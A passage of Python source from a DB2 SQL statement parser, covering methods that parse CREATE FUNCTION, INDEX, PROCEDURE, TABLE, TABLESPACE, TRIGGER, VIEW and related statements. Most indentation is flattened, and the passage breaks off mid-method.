self._expect(TT.IDENTIFIER)
self._match_one_of(['IMMEDIATE', 'DEFERRED'])
if self._match('ALL'):
self._expect('DBPARTITIONNUMS')
elif self._match('DATABASE'):
self._expect_sequence(['PARTITION', 'GROUP'])
self._parse_ident_list()
elif self._match('NODEGROUP'):
self._parse_ident_list()
self._expect('SIZE')
if self._match(TT.NUMBER):
self._match('AUTOMATIC')
elif self._match('AUTOMATIC'):
pass
else:
self._expected_one_of([TT.NUMBER, 'AUTOMATIC'])
# Parse function options (which can appear in any order)
valid = set(['NUMBLOCKPAGES', 'PAGESIZE', 'EXTENDED', 'EXCEPT', 'NOT'])
while valid:
t = self._match_one_of(valid)
if t:
t = t.value
valid.remove(t)
else:
break
            if t == 'EXCEPT':
self._expect('ON')
self._parse_db_partition_list_clause(size=True)
elif t == 'NUMBLOCKPAGES':
self._expect(TT.NUMBER)
if self._match('BLOCKSIZE'):
self._expect(TT.NUMBER)
elif t == 'PAGESIZE':
self._expect(TT.NUMBER)
self._match('K')
elif t == 'EXTENDED':
self._expect('STORAGE')
valid.remove('NOT')
elif t == 'NOT':
self._expect_sequence(['EXTENDED', 'STORAGE'])
valid.remove('EXTENDED')
def _parse_create_database_partition_group_statement(self):
"""Parses an CREATE DATABASE PARTITION GROUP statement"""
# CREATE [DATABASE PARTITION GROUP|NODEGROUP] already matched
self._expect(TT.IDENTIFIER)
if self._match('ON'):
if self._match('ALL'):
self._expect_one_of(['DBPARTITIONNUMS', 'NODES'])
else:
self._parse_db_partition_list_clause(size=False)
def _parse_create_event_monitor_statement(self):
"""Parses a CREATE EVENT MONITOR statement"""
# CREATE EVENT MONITOR already matched
self._expect(TT.IDENTIFIER)
self._expect('FOR')
self._save_state()
try:
self._parse_wlm_event_monitor()
except ParseError:
self._restore_state()
self._parse_nonwlm_event_monitor()
else:
self._forget_state()
def _parse_create_function_statement(self):
"""Parses a CREATE FUNCTION statement"""
# CREATE FUNCTION already matched
self._parse_function_name()
# Parse parameter list
self._expect('(', prespace=False)
if not self._match(')'):
while True:
self._save_state()
try:
self._expect(TT.IDENTIFIER)
self._parse_datatype()
except ParseError:
self._restore_state()
self._parse_datatype()
else:
self._forget_state()
self._match_sequence(['AS', 'LOCATOR'])
if not self._match(','):
break
self._expect(')')
self._indent()
# Parse function options (which can appear in any order)
valid = set([
'ALLOW',
'CALLED',
'CARDINALITY',
'CONTAINS',
'DBINFO',
'DETERMINISTIC',
'DISALLOW',
'EXTERNAL',
'FENCED',
'FINAL',
'INHERIT',
'LANGUAGE',
'MODIFIES',
'NO',
'NOT',
'NULL',
'PARAMETER',
'READS',
'RETURNS',
'SCRATCHPAD',
'SPECIFIC',
'STATIC',
'THREADSAFE',
'TRANSFORM',
'VARIANT',
])
while True:
# Ambiguity: INHERIT SPECIAL REGISTERS (which appears in the
# variable order options) and INHERIT ISOLATION LEVEL (which must
# appear after the variable order options). See below.
self._save_state()
try:
t = self._match_one_of(valid)
if t:
t = t.value
# Note that matches aren't removed from valid, because it's
# simply too complex to figure out what option disallows
# other options in many cases
else:
# break would skip the except and else blocks
raise ParseBacktrack()
if t == 'ALLOW':
self._expect('PARALLEL')
if self._match_sequence(['EXECUTE', 'ON', 'ALL']):
self._match_sequence(['DATABASE', 'PARTITIONS'])
self._expect_sequence(['RESULT', 'TABLE', 'DISTRIBUTED'])
elif t == 'CALLED':
self._expect_sequence(['ON', 'NULL', 'INPUT'])
elif t == 'CARDINALITY':
self._expect(TT.NUMBER)
elif t == 'CONTAINS':
self._expect('SQL')
elif t == 'DBINFO':
pass
elif t == 'DETERMINISTIC':
pass
elif t == 'DISALLOW':
self._expect('PARALLEL')
elif t == 'EXTERNAL':
if self._match('NAME'):
self._expect_one_of([TT.STRING, TT.IDENTIFIER])
else:
self._expect('ACTION')
elif t == 'FENCED':
pass
elif t == 'FINAL':
self._expect('CALL')
elif t == 'INHERIT':
# Try and parse INHERIT SPECIAL REGISTERS first
if not self._match('SPECIAL'):
raise ParseBacktrack()
self._expect('REGISTERS')
elif t == 'LANGUAGE':
self._expect_one_of(['SQL', 'C', 'JAVA', 'CLR', 'OLE'])
elif t == 'MODIFIES':
self._expect_sequence(['SQL', 'DATA'])
elif t == 'NO':
t = self._expect_one_of(['DBINFO', 'EXTERNAL', 'FINAL', 'SCRATCHPAD', 'SQL']).value
if t == 'EXTERNAL':
self._expect('ACTION')
elif t == 'FINAL':
self._expect('CALL')
elif t == 'NOT':
self._expect_one_of(['DETERMINISTIC', 'FENCED', 'THREADSAFE', 'VARIANT'])
elif t == 'NULL':
self._expect('CALL')
elif t == 'PARAMETER':
if self._match('CCSID'):
self._expect_one_of(['ASCII', 'UNICODE'])
else:
self._expect('STYLE')
self._expect_one_of(['DB2GENERAL', 'DB2GENERL', 'JAVA', 'SQL', 'DB2SQL'])
elif t == 'READS':
self._expect_sequence(['SQL', 'DATA'])
elif t == 'RETURNS':
if self._match('NULL'):
self._expect_sequence(['ON', 'NULL', 'INPUT'])
elif self._match_one_of(['ROW', 'TABLE']):
if self._match('('):
while True:
self._expect(TT.IDENTIFIER)
self._parse_datatype()
self._match_sequence(['AS', 'LOCATOR'])
if not self._match(','):
break
self._expect(')')
else:
self._parse_datatype()
if self._match_sequence(['CAST', 'FROM']):
self._parse_datatype()
self._match_sequence(['AS', 'LOCATOR'])
elif t == 'SCRATCHPAD':
self._expect(TT.NUMBER)
elif t == 'SPECIFIC':
self._expect(TT.IDENTIFIER)
elif t == 'STATIC':
self._expect('DISPATCH')
elif t == 'THREADSAFE':
pass
elif t == 'TRANSFORM':
self._expect_sequence(['GROUP', TT.IDENTIFIER])
elif t == 'VARIANT':
pass
self._newline()
except ParseBacktrack:
# NOTE: This block only gets called for ParseBacktrack errors.
                # Other parse errors will propagate outward. If the above has
# failed, rewind, and drop out of the loop so we can try
# INHERIT ISOLATION LEVEL (and PREDICATES)
self._restore_state()
break
else:
self._forget_state()
# Parse optional PREDICATES clause
if self._match('PREDICATES'):
self._parse_function_predicates_clause()
self._newline()
if self._match('INHERIT'):
self._expect_sequence(['ISOLATION', 'LEVEL'])
self._expect_one_of(['WITH', 'WITHOUT'])
self._expect_sequence(['LOCK', 'REQUEST'])
# Parse the function body
self._outdent()
if self._match('BEGIN'):
self._parse_compiled_compound_statement()
elif self._match('RETURN'):
self._indent()
self._parse_return_statement()
self._outdent()
else:
# External function with no body
pass
def _parse_create_function_mapping_statement(self):
"""Parses a CREATE FUNCTION MAPPING statement"""
# CREATE FUNCTION MAPPING already matched
if not self._match('FOR'):
self._expect_sequence([TT.IDENTIFIER, 'FOR'])
if not self._match('SPECIFIC'):
self._parse_function_name()
self._expect('(', prespace=False)
self._parse_datatype_list()
self._expect(')')
else:
self._parse_function_name()
self._expect('SERVER')
self._parse_remote_server()
if self._match('OPTIONS'):
self._parse_federated_options()
self._match_sequence(['WITH', 'INFIX'])
def _parse_create_histogram_template_statement(self):
"""Parses a CREATE HISTOGRAM TEMPLATE statement"""
# CREATE HISTOGRAM TEMPLATE already matched
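        # e.g. CREATE HISTOGRAM TEMPLATE tmpl1 HIGH BIN VALUE 30000000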
self._expect_sequence([TT.IDENTIFIER, 'HIGH', 'BIN', 'VALUE', TT.NUMBER])
def _parse_create_index_statement(self, unique):
"""Parses a CREATE INDEX statement"""
# CREATE [UNIQUE] INDEX already matched
self._parse_index_name()
self._indent()
self._expect('ON')
self._parse_table_name()
self._expect('(')
self._indent()
while True:
if self._match('BUSINESS_TIME'):
self._expect_sequence(['WITHOUT', 'OVERLAPS'])
else:
self._expect(TT.IDENTIFIER)
self._match_one_of(['ASC', 'DESC'])
if not self._match(','):
break
else:
self._newline()
self._outdent()
self._expect(')')
valid = set([
'IN',
'PARTITIONED',
'NOT',
'SPECIFICATION',
'INCLUDE',
'CLUSTER',
'PCTFREE',
'LEVEL2',
'MINPCTUSED',
'ALLOW',
'DISALLOW',
'PAGE',
'COLLECT',
'COMPRESS',
])
while valid:
t = self._match_one_of(valid)
if t:
self._newline(-1)
t = t.value
valid.remove(t)
else:
break
if t == 'IN':
self._expect(TT.IDENTIFIER)
elif t == 'NOT':
self._expect('PARTITIONED')
valid.discard('NOT')
elif t == 'PARTITIONED':
valid.discard('NOT')
elif t == 'SPECIFICATION':
self._expect('ONLY')
elif t == 'INCLUDE':
self._expect('(')
self._indent()
self._parse_ident_list(newlines=True)
self._outdent()
self._expect(')')
elif t == 'CLUSTER':
pass
elif t == 'PCTFREE' or t == 'MINPCTUSED':
self._expect(TT.NUMBER)
elif t == 'LEVEL2':
self._expect_sequence(['PCTFREE', TT.NUMBER])
elif t == 'ALLOW' or t == 'DISALLOW':
valid.discard('ALLOW')
valid.discard('DISALLOW')
self._expect_sequence(['REVERSE', 'SCANS'])
elif t == 'PAGE':
self._expect('SPLIT')
self._expect_one_of(['SYMMETRIC', 'HIGH', 'LOW'])
elif t == 'COLLECT':
self._match('SAMPLED')
self._match('DETAILED')
self._expect('STATISTICS')
elif t == 'COMPRESS':
self._expect_one_of(['NO', 'YES'])
def _parse_create_module_statement(self):
"""Parses a CREATE MODULE statement"""
# CREATE MODULE already matched
self._parse_module_name()
def _parse_create_nickname_statement(self):
"""Parses a CREATE NICKNAME statement"""
# CREATE NICKNAME already matched
self._parse_nickname_name()
if self._match('FOR'):
self._parse_remote_object_name()
else:
self._parse_table_definition(aligntypes=True, alignoptions=True, federated=True)
self._expect_sequence(['FOR', 'SERVER', TT.IDENTIFIER])
if self._match('OPTIONS'):
self._parse_federated_options()
def _parse_create_procedure_statement(self):
"""Parses a CREATE PROCEDURE statement"""
# CREATE PROCEDURE already matched
self._parse_procedure_name()
if self._match('SOURCE'):
self._parse_source_object_name()
if self._match('(', prespace=False):
self._expect(')')
elif self._match('NUMBER'):
self._expect_sequence(['OF', 'PARAMETERS', TT.NUMBER])
if self._match('UNIQUE'):
self._expect(TT.STRING)
            self._expect_sequence(['FOR', 'SERVER', TT.IDENTIFIER])
elif self._match('(', prespace=False):
if not self._match(')'):
while True:
self._match_one_of(['IN', 'OUT', 'INOUT'])
self._save_state()
try:
self._expect(TT.IDENTIFIER)
self._parse_datatype()
except ParseError:
self._restore_state()
self._parse_datatype()
else:
self._forget_state()
if self._match('DEFAULT'):
self._parse_expression()
if not self._match(','):
break
self._expect(')')
self._indent()
# Parse procedure options (which can appear in any order)
valid = set([
'AUTONOMOUS',
'CALLED',
'COMMIT',
'CONTAINS',
'DBINFO',
'DETERMINISTIC',
'DYNAMIC',
'EXTERNAL',
'FENCED',
'INHERIT',
'LANGUAGE',
'MODIFIES',
'NEW',
'NO',
            'NOT',
'NULL',
'OLD',
'PARAMETER',
'PROGRAM',
'READS',
'RESULT',
'SPECIFIC',
'THREADSAFE',
'WITH',
])
while True:
t = self._match_one_of(valid)
if t:
t = t.value
# Note that matches aren't removed from valid, because it's
# simply too complex to figure out what option disallows other
# options in many cases
else:
break
if t == 'AUTONOMOUS':
pass
elif t == 'CALLED':
self._expect_sequence(['ON', 'NULL', 'INPUT'])
elif t == 'COMMIT':
self._expect_sequence(['ON', 'RETURN'])
self._expect_one_of(['NO', 'YES'])
elif t == 'CONTAINS':
self._expect('SQL')
elif t == 'DBINFO':
pass
elif t == 'DETERMINISTIC':
pass
elif t == 'DYNAMIC':
self._expect_sequence(['RESULT', 'SETS', TT.NUMBER])
elif t == 'EXTERNAL':
if self._match('NAME'):
self._expect_one_of([TT.STRING, TT.IDENTIFIER])
else:
self._expect('ACTION')
elif t == 'FENCED':
pass
elif t == 'INHERIT':
self._expect_sequence(['SPECIAL', 'REGISTERS'])
elif t == 'LANGUAGE':
self._expect_one_of(['SQL', 'C', 'JAVA', 'COBOL', 'CLR', 'OLE'])
elif t == 'MODIFIES':
self._expect_sequence(['SQL', 'DATA'])
elif t in ['NEW', 'OLD']:
self._expect_sequence(['SAVEPOINT', 'LEVEL'])
elif t == 'NO':
if self._match('EXTERNAL'):
self._expect('ACTION')
else:
self._expect_one_of(['DBINFO', 'SQL'])
elif t == 'NOT':
self._expect_one_of(['DETERMINISTIC', 'FENCED', 'THREADSAFE'])
elif t == 'NULL':
self._expect('CALL')
elif t == 'PARAMETER':
if self._match('CCSID'):
self._expect_one_of(['ASCII', 'UNICODE'])
else:
self._expect('STYLE')
p = self._expect_one_of([
'DB2GENERAL',
'DB2GENERL',
'DB2DARI',
'DB2SQL',
'GENERAL',
'SIMPLE',
'JAVA',
'SQL'
]).value
if p == 'GENERAL':
self._match_sequence(['WITH', 'NULLS'])
elif p == 'SIMPLE':
self._expect('CALL')
self._match_sequence(['WITH', 'NULLS'])
elif t == 'PROGRAM':
self._expect('TYPE')
self._expect_one_of(['SUB', 'MAIN'])
elif t == 'READS':
self._expect_sequence(['SQL', 'DATA'])
elif t == 'RESULT':
self._expect_sequence(['SETS', TT.NUMBER])
elif t == 'SPECIFIC':
self._expect(TT.IDENTIFIER)
elif t == 'THREADSAFE':
pass
elif t == 'WITH':
self._expect_sequence(['RETURN', 'TO'])
self._expect_one_of(['CALLER', 'CLIENT'])
self._expect('ALL')
self._newline()
self._outdent()
self._expect('BEGIN')
self._parse_compiled_compound_statement()
def _parse_create_role_statement(self):
"""Parses a CREATE ROLE statement"""
# CREATE ROLE already matched
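        # e.g. CREATE ROLE manager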
self._expect(TT.IDENTIFIER)
def _parse_create_schema_statement(self):
"""Parses a CREATE SCHEMA statement"""
# CREATE SCHEMA already matched
if self._match('AUTHORIZATION'):
self._expect(TT.IDENTIFIER)
else:
self._expect(TT.IDENTIFIER)
if self._match('AUTHORIZATION'):
self._expect(TT.IDENTIFIER)
# Parse CREATE/COMMENT/GRANT statements
while True:
if self._match('CREATE'):
if self._match('TABLE'):
self._parse_create_table_statement()
elif self._match('VIEW'):
self._parse_create_view_statement()
elif self._match('INDEX'):
self._parse_create_index_statement(unique=False)
elif self._match_sequence(['UNIQUE', 'INDEX']):
self._parse_create_index_statement(unique=True)
else:
self._expected_one_of(['TABLE', 'VIEW', 'INDEX', 'UNIQUE'])
elif self._match_sequence(['COMMENT', 'ON']):
self._parse_comment_statement()
elif self._match('GRANT'):
self._parse_grant_statement()
else:
break
def _parse_create_security_label_component_statement(self):
"""Parses a CREATE SECURITY LABEL COMPONENT statement"""
# CREATE SECURITY LABEL COMPONENT already matched
self._expect(TT.IDENTIFIER)
if self._match('ARRAY'):
self._expect('[', prespace=False)
while True:
self._expect(TT.STRING)
if not self._match(','):
break
self._expect(']')
elif self._match('SET'):
self._expect('{', prespace=False)
while True:
self._expect(TT.STRING)
if not self._match(','):
break
self._expect('}')
elif self._match('TREE'):
self._expect_sequence(['(', TT.STRING, 'ROOT'], prespace=False)
while self._match(','):
self._expect_sequence([TT.STRING, 'UNDER', TT.STRING])
self._expect(')')
def _parse_create_security_label_statement(self):
"""Parses a CREATE SECURITY LABEL statement"""
# CREATE SECURITY LABEL already matched
self._parse_security_label_name()
while True:
self._expect_sequence(['COMPONENT', TT.IDENTIFIER, TT.STRING])
while self._match_sequence([',', TT.STRING]):
pass
if not self._match(','):
break
def _parse_create_security_policy_statement(self):
"""Parses a CREATE SECURITY POLICY statement"""
# CREATE SECURITY POLICY already matched
self._expect_sequence([TT.IDENTIFIER, 'COMPONENTS'])
while True:
self._expect(TT.IDENTIFIER)
if not self._match(','):
break
self._expect_sequence(['WITH', 'DB2LBACRULES'])
if self._match_one_of(['OVERRIDE', 'RESTRICT']):
self._expect_sequence(['NOT', 'AUTHORIZED', 'WRITE', 'SECURITY', 'LABEL'])
def _parse_create_sequence_statement(self):
"""Parses a CREATE SEQUENCE statement"""
# CREATE SEQUENCE already matched
self._parse_sequence_name()
if self._match('AS'):
self._parse_datatype()
self._parse_identity_options()
def _parse_create_service_class_statement(self):
"""Parses a CREATE SERVICE CLASS statement"""
# CREATE SERVICE CLASS already matched
self._expect(TT.IDENTIFIER)
if self._match('UNDER'):
self._expect(TT.IDENTIFIER)
if self._match_sequence(['AGENT', 'PRIORITY']):
self._expect_one_of(['DEFAULT', TT.NUMBER])
if self._match_sequence(['PREFETCH', 'PRIORITY']):
self._expect_one_of(['DEFAULT', 'HIGH', 'MEDIUM', 'LOW'])
if self._match_sequence(['OUTBOUND', 'CORRELATOR']):
self._expect_one_of(['NONE', TT.STRING])
if self._match_sequence(['COLLECT', 'ACTIVITY', 'DATA']):
self._parse_collect_activity_data_clause(alter=True)
if self._match_sequence(['COLLECT', 'AGGREGATE', 'ACTIVITY', 'DATA']):
self._expect_one_of(['NONE', 'BASE', 'EXTENDED'])
if self._match_sequence(['COLLECT', 'AGGREGATE', 'REQUEST', 'DATA']):
self._expect_one_of(['NONE', 'BASE'])
self._parse_histogram_template_clause()
self._match_one_of(['ENABLE', 'DISABLE'])
def _parse_create_server_statement(self):
"""Parses a CREATE SERVER statement"""
# CREATE SERVER already matched
self._expect(TT.IDENTIFIER)
if self._match('TYPE'):
self._expect(TT.IDENTIFIER)
if self._match('VERSION'):
self._parse_server_version()
if self._match('WRAPPER'):
self._expect(TT.IDENTIFIER)
if self._match('AUTHORIZATION'):
self._expect_sequence([TT.IDENTIFIER, 'PASSWORD', TT.IDENTIFIER])
if self._match('OPTIONS'):
self._parse_federated_options()
def _parse_create_table_statement(self):
"""Parses a CREATE TABLE statement"""
# CREATE TABLE already matched
self._parse_table_name()
if self._match('LIKE'):
self._parse_relation_name()
self._parse_copy_options()
else:
# Ambiguity: Open parentheses could indicate an optional field list
# preceding a materialized query or staging table definition
reraise = False
self._save_state()
try:
# Try parsing CREATE TABLE ... AS first
if self._match('('):
self._indent()
self._parse_ident_list(newlines=True)
self._outdent()
self._expect(')')
if self._match('AS'):
reraise = True
self._expect('(')
self._indent()
self._parse_full_select()
self._outdent()
self._expect(')')
self._parse_refreshable_table_options()
elif self._match('FOR'):
reraise = True
self._parse_relation_name()
                self._expect_sequence(['PROPAGATE', 'IMMEDIATE'])
else:
self._expected_one_of(['AS', 'FOR'])
except ParseError:
# If that fails, rewind and parse other CREATE TABLE forms
self._restore_state()
if reraise: raise
self._parse_table_definition(aligntypes=True, alignoptions=True, federated=False)
else:
self._forget_state()
# Parse table option suffixes. Not all of these are valid with
# particular table definitions, but it's too difficult to sort out
# which are valid for what we've parsed so far
valid = set([
'ORGANIZE',
'DATA',
'IN',
'INDEX',
'LONG',
'DISTRIBUTE',
'PARTITION',
'COMPRESS',
'VALUE',
'WITH',
'NOT',
'CCSID',
'SECURITY',
'OPTIONS',
])
while valid:
t = self._match_one_of(valid)
if t:
t = t.value
valid.remove(t)
else:
break
if t == 'ORGANIZE':
self._expect('BY')
if self._match_sequence(['KEY', 'SEQUENCE']):
self._expect('(')
while True:
self._expect(TT.IDENTIFIER)
if self._match('STARTING'):
self._match('FROM')
self._expect(TT.NUMBER)
self._expect('ENDING')
self._match('AT')
self._expect(TT.NUMBER)
if not self._match(','):
break
self._expect(')')
self._expect_one_of(['ALLOW', 'DISALLOW'])
self._expect('OVERFLOW')
if self._match('PCTFREE'):
                    self._expect(TT.NUMBER)
else:
self._match('DIMENSIONS')
self._expect('(')
while True:
if self._match('('):
self._parse_ident_list()
self._expect(')')
else:
self._expect(TT.IDENTIFIER)
                    if not self._match(','):
                        break
                self._expect(')')
elif t == 'DATA':
self._expect('CAPTURE')
self._expect_one_of(['CHANGES', 'NONE'])
elif t == 'IN':
self._parse_ident_list()
if self._match('NO'):
self._expect('CYCLE')
else:
self._match('CYCLE')
elif t == 'LONG':
self._expect('IN')
self._parse_ident_list()
elif t == 'INDEX':
self._expect_sequence(['IN', TT.IDENTIFIER])
elif t == 'DISTRIBUTE':
self._expect('BY')
if self._match('REPLICATION'):
pass
else:
self._match('HASH')
self._expect('(', prespace=False)
self._parse_ident_list()
self._expect(')')
elif t == 'PARTITION':
self._expect('BY')
self._match('RANGE')
self._expect('(')
while True:
self._expect(TT.IDENTIFIER)
if self._match('NULLS'):
self._expect_one_of(['FIRST', 'LAST'])
if not self._match(','):
break
self._expect_sequence([')', '('])
while True:
if self._match('PARTITION'):
self._expect(TT.IDENTIFIER)
self._parse_partition_boundary()
if self._match('IN'):
self._expect(TT.IDENTIFIER)
elif self._match('EVERY'):
if self._match('('):
self._expect(TT.NUMBER)
self._parse_duration_label()
self._expect(')')
else:
self._expect(TT.NUMBER)
self._parse_duration_label()
if not self._match(','):
break
elif t == 'COMPRESS':
self._expect_one_of(['NO', 'YES'])
elif t == 'VALUE':
self._expect('COMPRESSION')
elif t == 'WITH':
self._expect_sequence(['RESTRICT', 'ON', 'DROP'])
elif t == 'NOT':
self._expect_sequence(['LOGGED', 'INITIALLY'])
elif t == 'CCSID':
self._expect_one_of(['ASCII', 'UNICODE'])
elif t == 'SECURITY':
self._expect_sequence(['POLICY', TT.IDENTIFIER])
elif t == 'OPTIONS':
self._parse_federated_options(alter=False)
def _parse_create_tablespace_statement(self, tbspacetype='REGULAR'):
"""Parses a CREATE TABLESPACE statement"""
# CREATE TABLESPACE already matched
self._expect(TT.IDENTIFIER)
if self._match('IN'):
if self._match('DATABASE'):
self._expect_sequence(['PARTITION', 'GROUP'])
elif self._match('NODEGROUP'):
pass
self._expect(TT.IDENTIFIER)
if self._match('PAGESIZE'):
self._expect(TT.NUMBER)
self._match('K')
if self._match('MANAGED'):
self._expect('BY')
if self._match('AUTOMATIC'):
self._expect('STORAGE')
self._parse_tablespace_size_attributes()
elif self._match('DATABASE'):
self._expect('USING')
while True:
self._parse_database_container_clause()
if self._match('ON'):
self._parse_db_partition_list_clause(size=False)
if not self._match('USING'):
break
self._parse_tablespace_size_attributes()
elif self._match('SYSTEM'):
self._expect('USING')
while True:
self._parse_system_container_clause()
if self._match('ON'):
self._parse_db_partition_list_clause(size=False)
if not self._match('USING'):
break
else:
self._expected_one_of(['AUTOMATIC', 'DATABASE', 'SYSTEM'])
if self._match('EXTENTSIZE'):
self._expect(TT.NUMBER)
self._match_one_of(['K', 'M'])
if self._match('PREFETCHSIZE'):
self._expect(TT.NUMBER)
self._match_one_of(['K', 'M', 'G'])
if self._match('BUFFERPOOL'):
self._expect(TT.IDENTIFIER)
if self._match('OVERHEAD'):
self._expect(TT.NUMBER)
if self._match('NO'):
self._expect_sequence(['FILE', 'SYSTEM', 'CACHING'])
elif self._match('FILE'):
self._expect_sequence(['SYSTEM', 'CACHING'])
if self._match('TRANSFERRATE'):
self._expect(TT.NUMBER)
if self._match('DROPPED'):
self._expect_sequence(['TABLE', 'RECOVERY'])
self._expect_one_of(['ON', 'OFF'])
def _parse_create_threshold_statement(self):
"""Parses a CREATE THRESHOLD statement"""
# CREATE THRESHOLD already matched
self._expect_sequence([TT.IDENTIFIER, 'FOR'])
if self._match('SERVICE'):
self._expect_sequence(['CLASS', TT.IDENTIFIER])
if self._match('UNDER'):
self._expect(TT.IDENTIFIER)
elif self._match('WORKLOAD'):
self._expect(TT.IDENTIFIER)
elif not self._match('DATABASE'):
self._expected_one_of(['SERVICE', 'WORKLOAD', 'DATABASE'])
self._expect_sequence(['ACTIVITIES', 'ENFORCEMENT'])
if self._match('DATABASE'):
self._match('PARTITION')
elif self._match('WORKLOAD'):
self._expect('OCCURRENCE')
else:
self._expected_one_of(['DATABASE', 'WORKLOAD'])
self._match_one_of(['ENABLE', 'DISABLE'])
self._expect('WHEN')
self._parse_threshold_predicate()
self._parse_threshold_exceeded_actions()
def _parse_create_trigger_statement(self):
"""Parses a CREATE TRIGGER statement"""
# CREATE TRIGGER already matched
self._parse_trigger_name()
self._indent()
if self._match_sequence(['NO', 'CASCADE']):
self._expect('BEFORE')
elif self._match('BEFORE'):
pass
elif self._match_sequence(['INSTEAD', 'OF']):
pass
elif self._match('AFTER'):
pass
else:
self._expected_one_of(['AFTER', 'BEFORE', 'NO', 'INSTEAD'])
if self._match('UPDATE'):
if self._match('OF'):
self._indent()
self._parse_ident_list(newlines=True)
self._outdent()
else:
self._expect_one_of(['INSERT', 'DELETE', 'UPDATE'])
self._expect('ON')
self._parse_table_name()
if self._match('REFERENCING'):
self._newline(-1)
valid = ['OLD', 'NEW', 'OLD_TABLE', 'NEW_TABLE']
while valid:
if len(valid) == 4:
t = self._expect_one_of(valid)
else:
t = self._match_one_of(valid)
if t:
t = t.value
valid.remove(t)
else:
break
if t in ('OLD', 'NEW'):
if 'OLD_TABLE' in valid: valid.remove('OLD_TABLE')
if 'NEW_TABLE' in valid: valid.remove('NEW_TABLE')
elif t in ('OLD_TABLE', 'NEW_TABLE'):
if 'OLD' in valid: valid.remove('OLD')
if 'NEW' in valid: valid.remove('NEW')
self._match('AS')
self._expect(TT.IDENTIFIER)
self._newline()
self._expect_sequence(['FOR', 'EACH'])
self._expect_one_of(['ROW', 'STATEMENT'])
if self._match('MODE'):
self._newline(-1)
self._expect('DB2SQL')
if self._match('WHEN'):
self._expect('(')
self._indent()
self._parse_search_condition()
self._outdent()
self._expect(')')
try:
label = self._expect(TT.LABEL).value
self._outdent(-1)
self._newline()
except ParseError:
label = None
if self._match('BEGIN'):
if not label: self._outdent(-1)
self._parse_compiled_compound_statement(label=label)
else:
self._newline()
self._parse_compiled_statement()
if not label: self._outdent()
# XXX This shouldn't be here, but DB2 for z/OS appears to have a
# parser bug which allows this
self._match_sequence([(TT.TERMINATOR, ';'), (TT.KEYWORD, 'END')])
def _parse_create_trusted_context_statement(self):
"""Parses a CREATE TRUSTED CONTEXT statement"""
# CREATE TRUSTED CONTEXT already matched
self._expect_sequence([TT.IDENTIFIER, 'BASED', 'UPON', 'CONNECTION', 'USING'])
valid = set([
'SYSTEM',
'ATTRIBUTES',
'NO',
'DEFAULT',
'DISABLE',
'ENABLE',
'WITH',
])
while valid:
t = self._match_one_of(valid)
if t:
t = t.value
valid.remove(t)
else:
break
if t == 'SYSTEM':
self._expect_sequence(['AUTHID', TT.IDENTIFIER])
elif t == 'ATTRIBUTES':
                self._expect('(')
                while True:
                    if self._match('ADDRESS'):
                        self._expect(TT.STRING)
                        if self._match('WITH'):
                            self._expect_sequence(['ENCRYPTION', TT.STRING])
                    elif self._match('ENCRYPTION'):
                        self._expect(TT.STRING)
                    if not self._match(','):
                        break
                self._expect(')')
elif t == 'NO':
valid.remove('DEFAULT')
self._expect_sequence(['DEFAULT', 'ROLE'])
elif t == 'DEFAULT':
valid.remove('NO')
self._expect_sequence(['ROLE', TT.IDENTIFIER])
elif t == 'DISABLE':
valid.remove('ENABLE')
elif t == 'ENABLE':
valid.remove('DISABLE')
elif t == 'WITH':
self._expect_sequence(['USE', 'FOR'])
if not self._match('PUBLIC'):
self._expect(TT.IDENTIFIER)
if self._match('ROLE'):
self._expect(TT.IDENTIFIER)
if self._match_one_of(['WITH', 'WITHOUT']):
self._expect('AUTHENTICATION')
def _parse_create_type_statement(self):
"""Parses a CREATE DISTINCT TYPE statement"""
# CREATE DISTINCT TYPE already matched
self._parse_type_name()
self._expect('AS')
self._parse_datatype()
if self._match('ARRAY'):
self._expect('[', prespace=False)
self._match(TT.NUMBER)
self._expect(']')
else:
self._match_sequence(['WITH', 'COMPARISONS'])
def _parse_create_type_mapping_statement(self):
"""Parses a CREATE TYPE MAPPING statement"""
# CREATE TYPE MAPPING already matched
self._match(TT.IDENTIFIER)
valid = set(['FROM', 'TO'])
t = self._expect_one_of(valid).value
valid.remove(t)
self._match_sequence(['LOCAL', 'TYPE'])
self._parse_datatype()
self._expect_one_of(valid)
self._parse_remote_server()
self._match('REMOTE')
self._expect('TYPE')
self._parse_type_name()
if self._match('FOR'):
self._expect_sequence(['BIT', 'DATA'])
elif self._match('(', prespace=False):
if self._match('['):
self._expect_sequence([TT.NUMBER, '..', TT.NUMBER], interspace=False)
self._expect(']')
else:
self._expect(TT.NUMBER)
if self._match(','):
if self._match('['):
self._expect_sequence([TT.NUMBER, '..', TT.NUMBER], interspace=False)
self._expect(']')
else:
self._expect(TT.NUMBER)
self._expect(')')
if self._match('P'):
self._expect_one_of(['=', '>', '<', '>=', '<=', '<>'])
self._expect('S')
def _parse_create_user_mapping_statement(self):
"""Parses a CREATE USER MAPPING statement"""
# CREATE USER MAPPING already matched
self._expect('FOR')
self._expect_one_of(['USER', TT.IDENTIFIER])
self._expect_sequence(['SERVER', TT.IDENTIFIER])
self._expect('OPTIONS')
self._parse_federated_options(alter=False)
def _parse_create_variable_statement(self):
"""Parses a CREATE VARIABLE statement"""
# CREATE VARIABLE already matched
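        # e.g. CREATE VARIABLE myschema.counter INTEGER DEFAULT 0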
self._parse_variable_name()
self._parse_datatype()
if self._match_one_of(['DEFAULT', 'CONSTANT']):
self._parse_expression()
def _parse_create_view_statement(self):
"""Parses a CREATE VIEW statement"""
# CREATE VIEW already matched
self._parse_view_name()
if self._match('('):
self._indent()
self._parse_ident_list(newlines=True)
self._outdent()
self._expect(')')
self._expect('AS')
self._newline()
self._parse_query()
valid = set(['CASCADED', 'LOCAL', 'CHECK', 'ROW', 'NO'])
while valid:
if not self._match('WITH'):
break
t = self._expect_one_of(valid).value
valid.remove(t)
if t in ('CASCADED', 'LOCAL', 'CHECK'):
valid.discard('CASCADED')
valid.discard('LOCAL')
valid.discard('CHECK')
if t != 'CHECK':
self._expect('CHECK')
self._expect('OPTION')
elif t == 'NO':
valid.remove('ROW')
self._expect_sequence(['ROW', 'MOVEMENT'])
elif t == 'ROW':
valid.remove('NO')
self._expect('MOVEMENT')
def _parse_create_work_action_set_statement(self):
"""Parses a CREATE WORK ACTION SET statement"""
# CREATE WORK ACTION SET already matched
self._expect(TT.IDENTIFIER)
self._expect('FOR')
if self._match('SERVICE'):
self._expect_sequence(['CLASS', TT.IDENTIFIER])
elif self._match('DATABASE'):
pass
else:
self._expected_one_of(['SERVICE', 'DATABASE'])
self._expect_sequence(['USING', 'WORK', 'CLASS', 'SET', TT.IDENTIFIER])
if self._match('('):
self._indent()
while True:
